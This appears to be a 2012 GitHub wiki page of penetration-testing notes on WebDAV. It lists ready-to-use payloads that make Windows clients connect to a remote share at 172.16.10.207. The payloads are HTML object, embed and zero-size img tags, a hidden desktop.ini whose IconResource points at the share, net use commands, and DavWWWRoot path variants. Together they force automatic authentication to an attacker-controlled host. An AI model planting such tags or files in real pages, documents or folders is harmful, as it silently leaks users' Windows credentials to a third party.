-
-
Notifications
You must be signed in to change notification settings - Fork 359
webdav
Rob Fuller edited this page Aug 29, 2012
·
1 revision
- WebDAV
- Special note, I've only noticed automatic authentication when using hostnames instead of IP addresses
- Semi-Automatic (no code execution required)
- HTML - Object tag:
html
<object data="\\\\172.16.10.207\\share1\\blah.png" type="image/jpeg"></object>
- HTML - Embed tag w/ Quicktime:
html
<embed height="50" src="\\\\172.16.10.207\\share1\\test.m3u" type="video/quicktime" width="200" controller="true" autoplay="true" kioskmode="true">
- HTLM - Image tag:
html
<img src="file:////172.16.10.207/share1/blah.png" width=0 height=0>
- desktop.ini hidden file with the following contents:
batch
[.ShellClassInfo]
IconResource=\\\\172.16.10.207\\share1\\blah.ico
[ViewState]
FolderType=Generic
- Shell:
net use \\\\172.16.10.207\\share1
- GUI:
Open IE or explorer to http://172.16.20.207/DavWWWRoot/share1/
- DavWWWRoot** is a special Shell designation that tells the OS to automatically use WebDAV instead of SMB.
- Special Notes
\\\\172.16.10.207@SSL@443\\DavWWWRoot\\share1\\
or
\\\\172.16.10.207@443\\DavWWWRoot\\share1\\
Windows XP supports port designations using a colon
\\\\172.16.10.207:80\\share1\\